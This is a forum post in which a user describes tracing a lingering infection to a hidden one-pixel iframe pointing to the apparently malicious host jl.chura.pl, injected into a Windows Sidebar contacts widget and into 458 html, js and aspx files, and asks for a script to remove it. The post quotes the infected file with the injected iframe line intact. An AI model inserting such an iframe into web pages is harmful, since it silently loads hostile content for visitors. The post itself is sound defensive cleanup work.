UPDATE:
Re: The last visible sign of the infections - The block of attempted access to jl.chura.pl/ru
I had shutdown the Sidebar & stopped it loading on startup & I no longer got the message about attempted access of the site.
I then did a little search for jl.chura in the contents of the sidebar folder's files & it flagged up contacts.html in the 'Contacts' widget folder.
When I searched in the file though it said not found. I scrolled through it found an obfuscated link to the site at the bottom:
<!--
////////////////////////////////////////////////////////////////////////////////
//
// THIS CODE IS NOT APPROVED FOR USE IN/ON ANY OTHER UI ELEMENT OR PRODUCT COMPONENT.
// Copyright (c) 2006 Microsoft Corporation. All rights reserved.
//
////////////////////////////////////////////////////////////////////////////////
-->
<html>
<head>
...
...
</head>
<body onLoad="myOnLoad();" scroll="no">
.....
.....
<div id="L_LOCEARCHWORD_text" style="display:none">Search</div>
<iframe src="http://jL.chUra.pl/rc/" width=1 height=1 frameborder=0></iframe>
</body>
<script src="js/contacts.js" type="text/javascript" language="javascript"></script>
</html>So every time windows loaded & the Sidebar started up it linked to the chura site.
I then did the same search on the whole drive & it flagged 458 files - Mostly html, js, & aspx.
Apart from a few binary files (that I'm still trying to find out why they were flagged as the text appears nowhere inside when viewed as text) they all contain the same iframe block inserted near the end of any body block.
Now all I have to do is remove the link from all these files...
I wish I could remember more grep commands than I can...
Once these links are gone - I think I'm clean.
Anyone got a script I can give a list of files & a line of text to be removed to?
Regards,
Paul